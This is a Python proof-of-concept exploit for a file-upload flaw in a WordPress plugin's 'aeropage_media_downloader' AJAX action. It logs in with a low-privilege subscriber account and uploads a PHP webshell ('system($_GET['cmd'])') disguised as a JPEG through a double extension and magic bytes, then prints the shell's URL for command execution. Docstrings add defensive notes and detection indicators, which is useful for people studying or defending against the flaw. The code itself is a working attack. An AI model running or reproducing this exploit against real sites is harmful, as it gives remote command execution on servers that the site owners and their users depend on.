#!/usr/bin/env python3
import requests
import argparse
def wp_login(site_url, username, password):
    """Log in through wp-login.php and return the session that was used.

    Args:
        site_url: Base URL of the WordPress site; "/wp-login.php" is appended
            to it as-is.
        username: Account name sent in the "log" form field.
        password: Account password sent in the "pwd" form field.

    Returns:
        The requests.Session that issued the login requests. The login
        response is never inspected, so the session comes back whether or
        not the credentials were accepted.
    """
    endpoint = f"{site_url}/wp-login.php"
    http = requests.Session()

    # Load the login form first. The response body is not parsed (no nonce is
    # extracted); the request only lets the session pick up any cookies set.
    http.get(endpoint)

    # Same form fields the standard WordPress login page submits.
    credentials = {"log": username, "pwd": password, "wp-submit": "Log In"}
    http.post(endpoint, data=credentials)

    return http
def exploit(session, target_url):
    """Send the proof-of-concept upload to the plugin's AJAX action.

    The request shows what an upload handler must reject: a file whose final
    extension is .php but whose declared MIME type and leading bytes look like
    a JPEG. A handler that trusts either of those two signals alone lets it
    through.

    Args:
        session: Logged-in session, as returned by wp_login(). The CLI help
            describes the account as a subscriber, i.e. low privilege.
        target_url: Base URL of the WordPress site.

    Returns:
        None. The outcome is only printed.

    Defensive notes (confirm against the plugin source or advisory):
        * The handler should enforce a capability check and a nonce on this
          action, and validate the final file extension against an allowlist.
        * The web server should not execute PHP from the upload directory.
        * Indicators worth alerting on: POSTs to admin-ajax.php with this
          action from low-privilege accounts, new *.php files appearing under
          the upload path, and requests to such files with a "cmd" query
          parameter.
    """
    endpoint = f"{target_url}/wp-admin/admin-ajax.php?action=aeropage_media_downloader"

    # First four bytes match a JPEG/JFIF start, so magic-byte sniffing is satisfied.
    jpeg_magic = b"\xFF\xD8\xFF\xE0"
    payload = jpeg_magic + b"<?php system($_GET['cmd']); ?>"

    # Double extension plus an image Content-Type: only a check on the last
    # extension would catch this.
    multipart = {"file": ("shell.jpg.php", payload, "image/jpeg")}

    print(f"[*] Uploading malicious file to {endpoint}")
    reply = session.post(endpoint, files=multipart)

    # NOTE(review): the listing lost its indentation; the failure message is
    # taken to pair with the status check, not with the regex match.
    accepted = reply.status_code == 200 and "success" in reply.text.lower()
    if not accepted:
        print(f"[-] Upload failed (HTTP {reply.status_code})")
        return

    print("[+] Exploit succeeded! Webshell uploaded.")

    # The response format is a guess by the author ("adjust regex as needed"),
    # so a successful upload may still print no path.
    import re
    saved = re.search(r"File saved at: (.+?\.php)", reply.text)
    if saved:
        print(f"[+] Webshell URL: {saved.group(1)}?cmd=id")
if __name__ == "__main__":
    # All three options are mandatory; the script has no interactive mode.
    # NOTE(review): a password passed via -p is visible in shell history and
    # process listings on the machine running the script.
    cli = argparse.ArgumentParser()
    cli.add_argument(
        "-u", "--url",
        required=True,
        help="Target WordPress site URL",
    )
    cli.add_argument(
        "-l", "--login",
        required=True,
        help="Subscriber username",
    )
    cli.add_argument(
        "-p", "--password",
        required=True,
        help="Subscriber password",
    )
    opts = cli.parse_args()

    # Log in first; wp_login() does not report whether the login succeeded.
    print(f"[*] Logging in as {opts.login}...")
    authed = wp_login(opts.url, opts.login, opts.password)

    # Then send the upload request on the same session.
    exploit(authed, opts.url)